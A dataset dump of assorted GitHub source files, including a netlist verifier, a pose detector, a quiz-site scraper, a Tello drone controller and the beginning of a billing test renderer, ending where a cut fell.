+{"seq_id":"38064993683","text":"#!/usr/bin/env python\nimport sys\nassert sys.version_info > (3,5)\n#from ipaddress import IPv4Address\nimport netifaces\n\nfrom sessionmanager import SessionManager\n\ndef get_local_ipv4_addresses():\n for interface in netifaces.interfaces():\n if netifaces.AF_INET in netifaces.ifaddresses(interface):\n for address_info in netifaces.ifaddresses(interface)[netifaces.AF_INET]:\n yield address_info['addr']\n\npeers = [\"192.168.122.1\",\"192.168.122.179\",\"192.168.122.113\"]\nlocal_addresses = list(get_local_ipv4_addresses())\n#print(local_addresses)\n#print(peers)\n_peers = []\nfor peer in peers:\n if peer not in local_addresses:\n print(\"using %s\" % peer)\n _peers.append(peer)\n\n# __peers = list(map(IPv4Address,_peers))\nsm = SessionManager(_peers)\n","repo_name":"hdb3/BGPspeaker","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17158262486","text":"# (c) Víctor Franco Sanchez 2022\n# For the FRAME Project.\n# Licensed under the MIT License (see https://github.com/jordicf/FRAME/blob/master/LICENSE.txt).\n\nfrom typing import Any\nfrom frame.die.die import Die\nfrom frame.netlist.netlist import Netlist, Module\nfrom argparse import ArgumentParser\n\n\ndef parse_options(prog: str | None = None, args: list[str] | None = None) -> dict[str, Any]:\n \"\"\"\n Parse the command-line arguments for the tool\n :param prog: tool name\n :param args: command-line arguments\n :return: a dictionary with the arguments\n \"\"\"\n parser = ArgumentParser(prog=prog, description=\"Verifies that the output netlist has the same relevant \"\n \"properties as the input netlist\", usage='%(prog)s [options]')\n parser.add_argument(\"ini_netlist\", type=str, help=\"Input netlist (.yaml)\")\n parser.add_argument(\"die\", type=str, help=\"Input die (.yaml)\")\n parser.add_argument(\"out_netlist\", type=str, help=\"Output netlist (.yaml)\")\n parser.add_argument(\"--epsilon\", type=float, dest='epsilon', default=1e-10,\n help=\"The maximum allowable error\")\n return vars(parser.parse_args(args))\n\n\ndef shape_check(m1: Module, m2: Module, epsilon: float):\n def get_hardness(m):\n t = \"soft\"\n if m.is_hard:\n t = \"hard\"\n if m.is_fixed:\n t = \"fixed\"\n return t\n t1 = get_hardness(m1)\n t2 = get_hardness(m2)\n if t1 != t2:\n print(\"Module\", m1.name, \"is\", t1, \"on the input, but\", t2, \"on the output\")\n return False\n if t1 == \"hard\" or t1 == \"fixed\":\n a1 = m1.rectangles[0]\n a2 = m2.rectangles[0]\n for i in range(0, len(m1.rectangles)):\n r1 = m1.rectangles[i]\n r2 = m2.rectangles[i]\n if abs((r1.center.x - a1.center.x) - (r2.center.x - a2.center.x)) > epsilon or \\\n abs((r1.center.y - a1.center.y) - (r2.center.y - a2.center.y)) > epsilon or \\\n abs(r1.shape.w - r2.shape.w) > epsilon or abs(r1.shape.h - r2.shape.h) > epsilon:\n print(\"Module\", m1.name, \"is hard, but does not keep the same shape\")\n return False\n return True\n if t1 == \"fixed\":\n p1 = m1.rectangles[0].center\n p2 = m2.rectangles[0].center\n if abs(p1.x - p2.x) > epsilon or abs(p1.y - p2.y) > epsilon:\n print(\"Module\", m1.name, \"is fixed, but its position changes\")\n return True\n return True\n\n\ndef area_check(m1: Module, m2: Module, epsilon: float):\n a1 = m1.area()\n a2 = m2.area()\n if abs(a1 - a2) > epsilon:\n print(\"Module\", m1.name, \"has different area on the input and on the output\")\n return False\n return True\n\n\ndef die_check(m: Module, die: Die, epsilon: float):\n ok = True\n for rect in m.rectangles:\n x1 = rect.center.x - rect.shape.w / 2\n x2 = rect.center.x + rect.shape.w / 2\n y1 = rect.center.y - rect.shape.h / 2\n y2 = rect.center.y + rect.shape.h / 2\n if max(x1, x2) > die.width + epsilon or \\\n min(x1, x2) < -epsilon or \\\n max(y1, y2) > die.height + epsilon or \\\n min(y1, y2) < -epsilon:\n print(\"Module\", m.name, \"falls outside of the die\")\n ok = False\n return ok\n\n\ndef rect_overlap(r1, r2, epsilon):\n x1 = r1.center.x - r1.shape.w / 2\n x1b = r1.center.x + r1.shape.w / 2\n y1 = r1.center.y - r1.shape.h / 2\n y1b = r1.center.y + r1.shape.h / 2\n x2 = r2.center.x - r2.shape.w / 2\n x2b = r2.center.x + r2.shape.w / 2\n y2 = r2.center.y - r2.shape.h / 2\n y2b = r2.center.y + r2.shape.h / 2\n left = x2b - epsilon < x1\n right = x1b - epsilon < x2\n bottom = y2b - epsilon < y1\n top = y1b - epsilon < y2\n return not top and not bottom and not left and not right\n\n\ndef overlap_check(m1: Module, m2: 
Module, epsilon: float):\n for r1 in m1.rectangles:\n for r2 in m2.rectangles:\n if rect_overlap(r1, r2, epsilon):\n print(\"Modules\", m1.name, \"and\", m2.name, \"intersect\")\n return False\n return True\n\n\ndef self_overlap_check(m: Module, epsilon: float):\n for r1 in m.rectangles:\n for r2 in m.rectangles:\n if r1 == r2:\n continue\n if rect_overlap(r1, r2, epsilon):\n print(\"Modules\", m.name, \"has self-intersecting rectangles\")\n return False\n return True\n\n\ndef main(prog: str | None = None, args: list[str] | None = None) -> int:\n \"\"\"\n Main function.\n \"\"\"\n options = parse_options(prog, args)\n ini_net = Netlist(options['ini_netlist'])\n out_net = Netlist(options['out_netlist'])\n epsilon = options['epsilon']\n die = Die(options['die'])\n\n o_names = set()\n mod_map = dict()\n\n ok = True\n\n for module in ini_net.modules:\n if module.name in mod_map:\n print(\"Module\", module.name, \"found twice on the input netlist\")\n ok = False\n continue\n mod_map[module.name] = module\n\n for module in out_net.modules:\n if module.name not in mod_map:\n print(\"Module\", module.name, \"is present on the output, but not on the input\")\n ok = False\n continue\n if module.name in o_names:\n print(\"Module\", module.name, \"found twice on the output netlist\")\n ok = False\n continue\n o_names.add(module.name)\n ok &= area_check(mod_map[module.name], module, epsilon)\n ok &= shape_check(mod_map[module.name], module, epsilon)\n ok &= die_check(module, die, epsilon)\n ok &= self_overlap_check(module, epsilon)\n for module2 in out_net.modules:\n if module == module2:\n continue\n ok &= overlap_check(module, module2, epsilon)\n\n for module in ini_net.modules:\n if module.name not in o_names:\n print(\"Module\", module.name, \"is present on the input, but not on the output\")\n ok = False\n\n if ok:\n print(\"No errors were found!\")\n else:\n print(\"Some errors were found\")\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jordicf/FRAME","sub_path":"tools/verifier/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
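The `rect_overlap` helper in verifier.py is a separating-axis test on axis-aligned rectangles. A quick standalone sanity check of its logic, using `SimpleNamespace` stand-ins for FRAME's rectangle objects (this assumes `rect_overlap` from the file above is in scope; the stand-in layout only mimics the `.center`/`.shape` attributes the function reads):

```python
from types import SimpleNamespace

def rect(cx, cy, w, h):
    return SimpleNamespace(center=SimpleNamespace(x=cx, y=cy),
                           shape=SimpleNamespace(w=w, h=h))

a = rect(0.0, 0.0, 2.0, 2.0)   # square spanning [-1, 1] x [-1, 1]
b = rect(1.5, 0.0, 2.0, 2.0)   # overlaps a on the right
c = rect(3.0, 0.0, 2.0, 2.0)   # fully disjoint from a

assert rect_overlap(a, b, 1e-10)
assert not rect_overlap(a, c, 1e-10)
```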
+{"seq_id":"22681900414","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\n\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\n\ndef calculate_angle(a, b, c):\n a = np.array(a)\n b = np.array(b)\n c = np.array(c)\n\n radians = np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n\n if angle > 180:\n angle = 360-angle\n print(angle)\n\n return angle\n\n\ncap = cv2.imread('img/l.jpg')\n# cap = cv2.imread('img/s.png')\n\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n\n image = cv2.cvtColor(cap, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = pose.process(image)\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n try:\n landmarks = results.pose_landmarks.landmark\n left_hip = landmarks[mp_pose.PoseLandmark.LEFT_HIP.value].y\n left_shoulder = landmarks[mp_pose.PoseLandmark.LEFT_SHOULDER.value].y\n right_hip = landmarks[mp_pose.PoseLandmark.RIGHT_HIP.value].y\n right_shoulder = landmarks[mp_pose.PoseLandmark.RIGHT_SHOULDER.value].y\n\n print(left_hip, left_shoulder, right_hip, right_shoulder)\n\n image.flags.writeable = True\n\n print(left_hip - left_shoulder, right_hip - right_shoulder)\n\n if -0.01 <= left_hip - left_shoulder <= 0.01 or -0.01 <= right_hip - right_shoulder <= 0.01:\n cv2.putText(image, 'lying down', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), cv2.LINE_4)\n\n except:\n pass\n\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245, 117, 66), thickness=2, circle_radius=2),\n mp_drawing.DrawingSpec(color=(245, 66, 230), thickness=2, circle_radius=2))\n\n cv2.imshow('MediaPipe Pose', image)\n cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"Channaris/pose_detect","sub_path":"pic_body.py","file_name":"pic_body.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23358698957","text":"from bs4 import BeautifulSoup\n### Read URL - HTTP\nimport urllib\n### Read URL - HTTPS\nfrom urllib.request import Request, urlopen\nimport pymongo\nimport re\n \n\n### Global variables\nno_content = ''\njson_names_qa = ['question', 'options', 'answer', 'answer_explanation']\njson_names_q_options = ['option_name', 'option_value']\n\n### Get Soup of given URL\ndef get_soup_for_http(url, is_https):\n try:\n if is_https:\n ### Read URL - HTTPS website\n hdr = {'User-Agent': 'Mozilla/5.0'}\n req = Request(url, headers = hdr)\n html = urlopen(req)\n # html = requests.get(url).text\n return BeautifulSoup(html, \"html.parser\")\n else:\n ### Read URL - HTTP website\n html = urllib.request.urlopen(url).read()\n return BeautifulSoup(html, \"html.parser\")\n except Exception as e:\n print(\"get_soup : \", e)\n return None\n\n### Get Soup of given path\ndef get_soup_from_path(file_path):\n try:\n ### Read from file\n # file_path = \"d:/Projects/NLP/ScrapContentFromWebsites/Data/Website.HTML\"\n with open(file_path, encoding = \"utf-8\") as f:\n html = f.read()\n return BeautifulSoup(html, 'html.parser')\n except Exception as e:\n print(\"get_soup : \", e)\n return None\n\n### Connect mongo db\ndef connect_mongo_db(port, client, db):\n try:\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n mydb = myclient[client]\n mycol = mydb[db]\n return mycol\n except Exception as e:\n print(\"connect_mongo_db : \", e)\n return None\n\n### Insert into db\ndef insert_into_db(db, json):\n try:\n port = 27017\n client = 'IndiaBix'\n mycol = connect_mongo_db(port, client, db)\n # print(json)\n result = mycol.insert_many(json)\n print(\"result.. \", result, '\\n')\n except Exception as e:\n print(\"insert_into_db : \", e)\n\n### Assign - empty json\ndef return_empty_json(json_names):\n try:\n json_qa = {}\n if len(json_names) > 0:\n for json_name in json_names:\n json_qa[json_name] = ''\n return json_qa\n else:\n return ''\n except Exception as e:\n print(\"assign_json_empty : \", e)\n return ''\n\n### Scrape - question\ndef scrape_question(html):\n try:\n return html.find('td', {'class': 'bix-td-qtxt'}).find('p').get_text().strip()\n except Exception as e:\n print(\"scrape_question : \", e)\n return ''\n\n### Scrape - question options\ndef scrape_question_options(html):\n try:\n options = []\n options_tag_table = html.find('table', {'class': 'bix-tbl-options'})\n options_tag_tr = options_tag_table.find_all('tr')\n for option_tag in options_tag_tr:\n if option_tag is not None:\n option_td = option_tag.findNext('td').extract()\n if option_td is not None:\n option_name = option_td.get_text().replace('.', '').strip()\n option_td = option_tag.findNext('td')\n if option_td is not None:\n option_value = option_td.get_text().strip()\n options.append({ 'option_name': option_name, 'option_value': option_value })\n return options\n except Exception as e:\n print(\"scrape_question_options : \", e)\n return return_empty_json(json_names_q_options)\n\n### Scrape - answer\ndef scrape_answer(html, options):\n try:\n q_answer_option_name = html.find('div', {'class': 'bix-div-answer mx-none'}).findNext('p').find_all('span')[1].get_text().strip()\n q_answer = {}\n for option in options:\n if option['option_name'] == q_answer_option_name:\n q_answer = {'option_name': option['option_name'], 'option_value': option['option_value']}\n break\n return q_answer\n except Exception as e:\n print(\"scrape_answer : \", e)\n return return_empty_json(json_names_q_options)\n\n### Scrape - answer 
explanation\ndef scrape_answer_explanation(html):\n try:\n return html.find('div', {'class': 'bix-ans-description'}).get_text().strip()\n except Exception as e:\n print(\"scrape_answer_explanation : \", e)\n return ''\n\n### Scrape - question, options and answer from container\ndef scrape_qa(table_qa):\n try:\n question = scrape_question(table_qa)\n options = scrape_question_options(table_qa)\n q_answer = scrape_answer(table_qa, options)\n answer_explanation = scrape_answer_explanation(table_qa)\n\n ### Define a json\n return { 'question': question, 'options': options, 'answer': q_answer, 'answer_explanation': answer_explanation }\n except Exception as e:\n print(\"scrape_qoae : \", e)\n return return_empty_json(json_names_qa)\n\n### Scrape - question, options, answer and answer explanation\ndef get_qa_from_container(soup):\n try:\n json_qa = []\n for table_qa in soup.find_all('table', {'class': 'bix-tbl-container'}):\n try:\n if table_qa is not None:\n json_qa.append(scrape_qa(table_qa))\n except Exception as e:\n print(\"table_qa : \", e)\n # print(json_qa, '\\n')\n return json_qa\n except Exception as e:\n print(\"get_qa_from_container : \", e)\n return []\n\n### Scrape - question, options, answer and answer explanation and insert into db\ndef scrape_insert_qa(primary_url, page_url, db):\n try:\n ### Get soup\n url = primary_url +'/'+ page_url\n soup = get_soup_for_http(url, True)\n ### Get qa\n json_qa = get_qa_from_container(soup)\n ### Insert into db\n if len(json_qa) > 0:\n insert_into_db(db, json_qa)\n\n condition = True\n while condition:\n page_container = soup.find('div', {'class', 'mx-pager-container'})\n if page_container is not None:\n current_span = page_container.find('span', {'class': 'mx-pager-current'})\n if current_span is not None:\n next_page = current_span.findNext('a')\n if next_page is not None:\n if next_page.findNext('span', {'class': 'mx-pager-no'}) is not None:\n next_page_url = next_page.get('href')\n ### Get soup\n url = primary_url +'/'+ next_page_url\n soup = get_soup_for_http(url, True)\n ### Get qa\n json_qa = get_qa_from_container(soup)\n ### Insert into db\n if len(json_qa) > 0:\n insert_into_db(db, json_qa)\n else:\n condition = False\n break\n else:\n condition = False\n break\n else:\n condition = False\n break\n else:\n condition = False\n break\n except Exception as e:\n print(\"scrape_insert_qa : \", e)\n return return_empty_json(json_names_qa)\n\n### Scrape - questions sections\ndef scrape_question_section(primary_url, qa_section, qa_tag):\n try:\n ### Get soup\n url = primary_url +'/'+ qa_section +'/'+ qa_tag\n soup = get_soup_for_http(url, False)\n topics_containers = soup.find_all('div', {'class': 'div-topics-index'})\n for topics_container in topics_containers:\n topics = topics_container.find_all('li')\n for topic in topics:\n if topic is not None:\n topic = topic.findNext('a')\n if topic is not None:\n topic = topic.get('href')\n if topic is not None:\n for topic_split in (topic_split for topic_split in topic.split('/') if topic_split is not ''):\n topic = topic_split\n topic = topic.replace('/', '')\n print('qa_section: '+ qa_section +' topic : '+ topic)\n page_url = qa_section +'/'+ topic\n db = qa_section.replace('-', '_') +'_'+ topic.replace('-', '_')\n # print(primary_url +'/'+ page_url, ' ', db)\n scrape_insert_qa(primary_url, page_url, db)\n\n except Exception as e:\n print(\"scrape_question_section : \", e)\n\n### Scrape - questions section list\ndef scrape_question_section_list(primary_url):\n try:\n qa_section = 'aptitude'\n 
qa_tag = 'questions-and-answers'\n ### Get soup\n soup = get_soup_for_http(primary_url, False)\n qa_section_containers = soup.find_all('ul', {'class': 'ques-ans'})\n for qa_section_container in qa_section_containers:\n qa_sections = qa_section_container.find_all('li')\n for qa_section in qa_sections:\n if qa_section is not None:\n qa_section = qa_section.findNext('a')\n if qa_section is not None:\n qa_section = qa_section.get('href')\n if qa_section is not None:\n if qa_tag in qa_section:\n for qa_section_split in (qa_section_split for qa_section_split in qa_section.split('/') if qa_section_split is not ''):\n topic = qa_section_split\n qa_section = qa_section.replace(qa_tag, '').replace('/', '')\n scrape_question_section(primary_url, qa_section, qa_tag)\n\n except Exception as e:\n print(\"scrape_question_section_list : \", e)\n\n### define a main funtion\ndef main():\n try:\n primary_url = 'https://www.indiabix.com'\n \n scrape_question_section_list(primary_url)\n except Exception as e:\n print(\"main : \", e)\n\n### Call main\nmain()","repo_name":"manoj-vkumar/Scrape_IndiaBix_QA","sub_path":"Code/QA_From_IndiaBix.py","file_name":"QA_From_IndiaBix.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
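The pager walk in `scrape_insert_qa` boils down to: fetch a page, then keep following the anchor that sits right after the `mx-pager-current` marker while a further page number exists. A hypothetical condensed sketch of the same idea (`iter_pages` is not a function in the original file, and it assumes the `mx-pager` markup described above):

```python
def iter_pages(primary_url, first_page_url):
    url = first_page_url
    while url:
        soup = get_soup_for_http(primary_url + '/' + url, True)
        yield soup
        # next page = the anchor right after the current-page marker, if any
        nxt = soup.select_one('.mx-pager-container span.mx-pager-current + a')
        more = nxt is not None and nxt.find_next('span', {'class': 'mx-pager-no'}) is not None
        url = nxt.get('href') if more else None
```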
+{"seq_id":"6295862341","text":"from djitellopy import Tello\nimport cv2\nimport time\nfrom os import environ\nimport os.path\nimport uuid\nfrom datetime import datetime\nfrom pathlib import Path\nfrom threading import Thread\nimport time, threading\n\n# pictures_folder = os.path.join(environ[\"USERPROFILE\"], \"Pictures\", \"tello\")\ndesktop = os.path.expanduser(\"~/Desktop\")\n# get the current date time\ncurrent_dateTime = datetime.now()\nfilepath = Path(f\"{desktop}/leaf Disease Detection/predictions/pictures\")\nfilepath.parent.mkdir(parents=True, exist_ok=True)\npictures_folder = f\"{desktop}/leaf Disease Detection/predictions/pictures\"\n# Speed of the drone\nS = 60\n\n# Frames per second of the pygame window display\n# A low number also results in input lag, as input information is processed once per frame.\nFPS = 180\n\n\nclass Aircraft(object):\n def __init__(self):\n # Init Tello object that interacts with the Tello drone\n self.tello = Tello()\n\n # Drone velocities between -100~100\n self.back_velocity = 0\n self.left_right_velocity = 0\n self.up_down_velocity = 0\n self.yaw_velocity = 0\n self.speed = 10\n self.has_takeoff = False\n\n self.send_rc_control = False\n\n self.is_connected = False\n self.is_streaming_video = False\n self.keepRecording = True\n\n self.frame_read = None\n\n # we need to run the recorder in a seperate thread, otherwise blocking options\n # would prevent frames from getting added to the video\n self.recorder = Thread(\n target=self.videoRecorder, args=lambda: self.keepRecording\n )\n\n def connect(self):\n \"\"\"\n Connect to the drone and activate parameters for streaming\n \"\"\"\n self.tello.connect()\n self.tello.set_speed(self.speed)\n\n # In case streaming is on. This happens when we quit this program abruptly.\n self.tello.streamoff()\n self.tello.streamon()\n\n self.frame_read = self.tello.get_frame_read()\n\n self.is_connected = True\n\n def initite_land(self):\n \"\"\"\n Land the aircraft\n \"\"\"\n if self.is_connected and self.has_takeoff:\n not self.tello.land() # land\n self.send_rc_control = False\n self.has_takeoff = False\n\n def initite_takeoff(self):\n \"\"\"\n Attempts to put the aircraft in motion by taking off. If the operation fails, retries\n for 10 times, if the operation fails then quits.\n \"\"\"\n retry_times = 0\n while self.is_connected and retry_times < 10 and not self.has_takeoff:\n try:\n self.tello.takeoff() # takeoff\n self.send_rc_control = True\n self.has_takeoff = True # make sure the aircraft has taken off before attempting to control it\n return True\n except:\n print(\"Error occurrd taking off. Retrying...\")\n\n if self.has_takeoff:\n return True\n\n self.tello.send_keepalive()\n\n # if the aircraft retries takeoff for 10 times without any success, quit taking\n # off. Maybe the aircraft became unavailable or is busy\n if retry_times == 10 and not self.has_takeoff:\n print(\"aircraft attempted takeoff 10 times without success. Quitting...\")\n return False\n\n def move(self, forward_back=0, left_right=0, up_down=0, yaw=0):\n \"\"\"\n Updates the aircraft motion according to the velocities passed to it\n \"\"\"\n\n self.back_velocity = forward_back\n self.left_right_velocity = left_right\n self.up_down_velocity = up_down\n self.yaw_velocity = yaw\n\n if self.is_connected and self.send_rc_control:\n self.tello.send_rc_control(left_right, forward_back, up_down, yaw)\n\n def update(self):\n \"\"\"\n Update routine. 
Send velocities to Tello.\n \"\"\"\n if self.is_connected and self.send_rc_control:\n self.tello.send_rc_control(\n self.left_right_velocity,\n self.back_velocity,\n self.up_down_velocity,\n self.yaw_velocity,\n )\n\n def capture_image(self):\n \"\"\"\n Captures an image and save it in the Pictures folder\n \"\"\"\n\n # create directory if it does not exist\n if not os.path.exists(pictures_folder):\n os.mkdir(pictures_folder)\n\n if self.is_connected:\n cv2.imwrite(\n f\"{pictures_folder}/{uuid.uuid4().hex}.png\", self.frame_read.frame\n )\n\n def stream_video(self):\n \"\"\"\n Streams a video and save it in the Pictures folder\n \"\"\"\n\n # create directory if it does not exist\n if not os.path.exists(pictures_folder):\n os.mkdir(pictures_folder)\n\n if self.is_connected:\n if not self.is_streaming_video:\n self.keepRecording = True\n self.recorder.start()\n else:\n self.is_streaming_video = False\n self.keepRecording = False\n self.recorder._stop_event.set()\n self.recorder.join()\n\n def get_frame(self):\n # self.send_keepalive()\n \"\"\"Returns the frame handle used to capture images from the vehicle\"\"\"\n if self.frame_read:\n return self.frame_read\n else:\n return None\n\n def get_battery(self):\n \"\"\"Returns the battery level of the aircraft\"\"\"\n if self.is_connected:\n return self.tello.get_battery()\n else:\n return 0\n\n def get_status(self):\n try:\n status = self.tello.get_battery()\n print(f\"this is the status of the drone {status}\")\n except:\n print(\"Could not get drone status cause it is not connected\")\n\n def get_altitude(self):\n \"\"\"Returns the current altitude of the aircraft\"\"\"\n if self.is_connected:\n return self.tello.get_height()\n else:\n return 0\n\n def videoRecorder(self, keepRecording):\n if self.is_connected:\n # create a VideoWrite object, recoring to ./guid.avi\n height, width, _ = self.frame_read.frame.shape\n # video = cv2.VideoWriter(f\"{pictures_folder}/{uuid.uuid4().hex}.avi\", cv2.VideoWriter_fourcc(*'XVID'), 30, (width, height))\n video = cv2.VideoWriter(\n f\"{pictures_folder}/{uuid.uuid4().hex}.mp4\",\n cv2.VideoWriter_fourcc(*\"MP4V\"),\n 30,\n (width, height),\n )\n\n while keepRecording:\n video.write(self.frame_read.frame)\n time.sleep(1 / 30)\n\n video.release()\n\n def get_state(self, key):\n return self.tello.get_state_field(key)\n","repo_name":"synper-ce/drone-project","sub_path":"viewmodels/aircraft.py","file_name":"aircraft.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
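aircraft.py stops its recorder by flipping `keepRecording` and joining the thread. A common standalone variant of that pattern uses `threading.Event`, which keeps the stop flag out of the instance state and makes the intent explicit (a generic sketch, not djitellopy-specific):

```python
import threading
import time

stop = threading.Event()

def recorder_loop():
    while not stop.is_set():
        # ... write one frame here ...
        time.sleep(1 / 30)   # ~30 FPS pacing

t = threading.Thread(target=recorder_loop)
t.start()
time.sleep(0.1)
stop.set()   # ask the loop to finish
t.join()     # wait until it actually exits
```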
+{"seq_id":"43797902763","text":"# 2846 오르막길\n\nN = int(input())\np = list(map(int, input().split()))\nstep = 0 # 높이 차이\nresult = 0 # 높이 중에 큰 값\nfor data in range(N-1):\n # 오르막이면\n if p[data+1] > p[data]:\n step += p[data+1] - p[data] # 높이 차이 저장\n else: # 내리막이거나 같은 높이라면 step 초기화\n step = 0\n result = max(result, step) # 기존 높이와 현재 높이 중 큰 값\nprint(result)","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week02_230119/2846_오르막길/2846_정광배.py","file_name":"2846_정광배.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"29058889737","text":"import typing as tp\nfrom abc import ABC, abstractmethod\nfrom os import path\n\nfrom billing.hot.tests.lib.date import formatted\nfrom billing.hot.tests.lib.rand import rand\nfrom billing.hot.tests.lib.templates import loader\nfrom billing.hot.tests.lib.util.util import deep_update\nfrom billing.hot.tests.lib.state import contract as contr\n\nif tp.TYPE_CHECKING:\n from billing.hot.tests.lib.state import state\n\n\nclass ProcessorLoader:\n def __init__(self, template_dir: str) -> None:\n self.loader = loader.TemplateLoader(template_dir)\n\n def load_actotron_act_rows_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('actotron_act_rows', name))\n\n def load_taxi_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('taxi', name))\n\n def load_oplata_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('oplata', name))\n\n def load_bnpl_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('bnpl', name))\n\n def load_bnpl_income_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('bnpl_income', name))\n\n def load_taxi_light_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('taxi_light', name))\n\n def load_trust_request(self, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join('trust', name))\n\n def load_request(self, folder: str, name: str) -> loader.RenderedTemplate:\n return self.loader.load(path.join(folder, name))\n\n\nclass ProcessorActotronActRowsRendererMixin:\n @staticmethod\n def render_acts_request(\n st: 'state.PipelineState',\n contract_type: type,\n request: dict,\n namespace: str,\n act_sum_positive: float,\n act_sum_negative: float,\n act_sum_wo_vat_positive: float,\n act_sum_wo_vat_negative: float,\n ) -> loader.RenderedTemplate:\n request['namespace'] = namespace\n\n act_row_id = rand.hex(16)\n st.add_transactions([act_row_id])\n\n event: dict[str, tp.Any] = request['event']['obj']\n event.update({\n 'act_row_id': act_row_id,\n 'client_id': st.client_id,\n 'act_sum': act_sum_positive + act_sum_negative,\n 'contract_id': st.get_contract(contract_type).id,\n 'act_start_dt': formatted.shifted_date_iso(hours=-4),\n 'act_finish_dt': formatted.shifted_date_iso(hours=-3),\n })\n sum_components: dict[str, tp.Any] = event['act_sum_components']\n sum_components.update({\n 'act_sum_positive': act_sum_positive,\n 'act_sum_negative': act_sum_negative,\n 'act_sum_wo_vat_positive': act_sum_wo_vat_positive,\n 'act_sum_wo_vat_negative': act_sum_wo_vat_negative,\n })\n\n return request\n\n\nclass BaseProcessorRenderer(ABC):\n def __init__(self, lder: ProcessorLoader) -> None:\n self.loader = lder\n\n @abstractmethod\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n raise NotImplementedError\n\n @staticmethod\n def _render_payout_request(\n st: 'state.PipelineState',\n request: loader.RenderedTemplate,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n event = request['event']\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"client_id\": st.client_id,\n \"event_time\": formatted.date_iso(),\n \"transaction_id\": str(t_id),\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n\nclass ProcessorBnplRenderer(BaseProcessorRenderer, ProcessorActotronActRowsRendererMixin):\n def render_request(self, sender_state: 
'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'cashless':\n return self.render_cashless_request(\n sender_state=sender_state,\n contract_type=contr.BnplContract,\n request=sender_state.template,\n transaction_amount=event.get('transaction_amount'),\n total_commission=event.get('total_commission'),\n )\n if sender_state.endpoint == 'payout':\n return self.render_payout_request(\n st=sender_state,\n request=self.loader.load_bnpl_request(sender_state.template),\n extended_params=event\n )\n if sender_state.endpoint == 'acts':\n return self.render_acts_request(\n st=sender_state,\n contract_type=contr.BnplContract,\n request=self.loader.load_actotron_act_rows_request(name=sender_state.template),\n namespace=sender_state.namespace,\n act_sum_positive=event.get('act_sum_positive', 0),\n act_sum_negative=event.get('act_sum_negative', 0),\n act_sum_wo_vat_positive=event.get('act_sum_wo_vat_positive', 0),\n act_sum_wo_vat_negative=event.get('act_sum_wo_vat_negative', 0)\n )\n\n raise LookupError(f'unknown endpoint for ProcessorBnplRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: tp.Optional[dict] = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_bnpl_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_cashless_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n transaction_amount: tp.Optional[float] = None,\n total_commission: tp.Optional[float] = None,\n ):\n if isinstance(request, str):\n request = self.loader.load_bnpl_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event(sender_state, event, contract_type)\n\n if transaction_amount:\n event['transaction_amount'] = transaction_amount\n\n if total_commission:\n event['aquiring_commission'] = total_commission // 2\n event['service_commission'] = total_commission - event['aquiring_commission']\n\n return request\n\n @staticmethod\n def _update_event(\n sender_state: 'state.PipelineState',\n event: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n event.update({\n 'billing_client_id': sender_state.client_id,\n 'billing_contract_id': sender_state.get_contract(contract_type).id,\n 'order_creation_dt': formatted.shifted_date_iso(hours=-4),\n 'transaction_dt': formatted.shifted_date_iso(hours=-3),\n 'transaction_id': f'transaction_id-{sender_state.order_uid}-{event[\"transaction_type\"]}',\n })\n\n\nclass ProcessorBnplIncomeRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n if sender_state.endpoint == 'commission':\n return self.render_commission_request(\n st=sender_state,\n contract_type=contr.BnplIncomeContract,\n 